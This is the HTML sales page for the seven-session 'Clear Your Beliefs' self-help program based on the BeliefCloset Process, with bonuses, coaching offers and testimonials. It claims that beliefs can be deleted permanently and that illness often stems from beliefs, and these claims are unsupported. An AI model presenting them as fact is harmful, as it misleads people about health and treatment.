you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class. He or she will help you go deeper than you could possibly go with a recorded class, or on your own. He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<h1>With This Methodology, You Can Finally:</h1>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<h1>A Message from Lion Goodman...</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n\nDear Explorer:\n\nAs a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.\n\nI was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording. You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There''s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<h5>Session 1: <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you''ll examine your old beliefs, and determine which ones no longer serve you. It''s time to discard them and clear some space! You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 2: <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet. It''s time to haul them out, and toss them out! You don''t need them anymore. If you hear critical inner voices berating you, don''t miss this session. Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 3: <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of? </em>If your answer is "Anything..." you don''t need this session. But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use? You''ll fail anyway. You don''t deserve happiness – look at you!" </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 4: <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure? Or are you anxious about the future? If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned "what love is" from your parents – so it''s no wonder that you''re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like. In your family, love may have been contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 5: <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy? Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 6: <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood. What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 7: <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1: <strong>Love: What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program. (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships. We''re confused about what love is, and how to love. The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work? You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras. </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</em></strong> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</em></strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</em></strong> Optional.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n\n<strong>– G. J., software developer</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n\n<strong>~ T. L., Healer, Stamford, CT 